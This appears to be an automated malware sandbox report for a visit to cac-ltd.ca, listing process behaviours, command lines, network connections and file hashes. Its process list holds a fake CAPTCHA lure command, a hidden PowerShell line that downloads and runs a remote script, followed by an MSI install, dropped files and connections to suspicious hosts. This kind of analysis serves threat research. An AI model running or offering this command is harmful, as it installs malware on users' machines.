N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4312 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 3860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 3860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://cac-ltd.ca/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb09046f8,0x7fffb0904708,0x7fffb0904718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

cmd /c start /min powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\8ab.msi"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\8ab.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6B0897BF9B0BFC5C33497F7960BD05E6 C

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{883FDC82-2DAD-4A12-A0E8-55236ACAF576}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{C70D3561-E6A6-4677-9B03-AFA7DD5FD740}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{09951C22-2C83-46B1-BC58-251BDE1F87F4}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{5107D142-0AF4-4E89-AFDE-1979AB02F34D}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{01D187BB-1674-403E-B802-BF4BA547F128}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{2999517C-2F1F-440E-923A-3DF1DFAB1AFB}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4DECE0DB-7710-482E-AEB7-05E45C12AA3A}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{2F8A9065-6B6E-4D8E-AC74-2B626783A691}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6CD903AB-76A2-4553-A3C5-F3CDE8BF0D05}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{787E3687-F2C3-46AA-BB32-3CCD4CB168D3}

C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe

C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe

C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe

C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 cac-ltd.ca udp
US 208.109.23.179:80 cac-ltd.ca tcp
US 208.109.23.179:80 cac-ltd.ca tcp
US 8.8.8.8:53 www.cac-ltd.ca udp
US 208.109.23.179:443 www.cac-ltd.ca tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 tripallmaljok.com udp
US 8.8.8.8:53 s.w.org udp
TN 91.92.46.97:443 tripallmaljok.com tcp
US 8.8.8.8:53 kalkgmbzfghq.com udp
US 104.21.48.122:443 kalkgmbzfghq.com tcp
N/A 224.0.0.251:5353 udp
US 192.0.77.48:443 s.w.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 serviceverifcaptcho.com udp
US 104.21.79.96:443 serviceverifcaptcho.com tcp
US 8.8.8.8:53 tripallmaljok.com udp
TN 91.92.46.97:443 tripallmaljok.com tcp
US 8.8.8.8:53 kalkgmbzfghq.com udp
US 172.67.151.59:443 kalkgmbzfghq.com tcp
US 104.21.79.96:443 serviceverifcaptcho.com tcp
GB 95.100.153.187:443 www.bing.com tcp
RU 92.255.85.23:15847 tcp
RU 92.255.85.23:9000 92.255.85.23 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 94bd9c36e88be77b106069e32ac8d934
SHA1 32bd157b84cde4eaf93360112d707056fc5b0b86
SHA256 8f49a43a08e2984636b172a777d5b3880e6e82ad25b427fef3f05b7b4f5c5b27
SHA512 7d4933fae6a279cc330fde4ae9425f66478c166684a30cec9c5c3f295289cf83cbdf604b8958f6db64b0a4b1566db102fbcbdcdb6eca008d86d9a9c8b252ff16

\??\pipe\LOCAL\crashpad_4312_UNXODKIDPWIBCYCY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 25f87986bcd72dd045d9b8618fb48592
SHA1 c2d9b4ec955b8840027ff6fd6c1f636578fef7b5
SHA256 d8b542281740c12609279f2549f85d3c94e6e49a3a2a4b9698c93cca2dce486c
SHA512 0c8a0d1a3b0d4b30773b8519a3d6e63d92973733da818ca9838599a9639e18df18ce31ebf56f46f6bbb7d89d10c726f4d73781e154d115a6068a3be7dd12b314

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 88cc2890127161630f6a3e56d6457a04
SHA1 909870a3de3bbd4f45d5febcff526e136170538f
SHA256 947906cbb6455400a0b1e6d6d7a0f5604fa9cc17c2cb53a677f2fdbd5ded75e7
SHA512 3d27884859b86f31cab615cb879b0529c86a6dd2a8fae65bcb87520b39dd8b3c3a2d3208d45260c726ede0f8598fc3301b600efb4a785370bc896f73b7f60974

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6dbdc92bf2fcba4dae94a47b04861aa4
SHA1 4d6eb6af6c19549ad6c2f75d332162c2f775f536
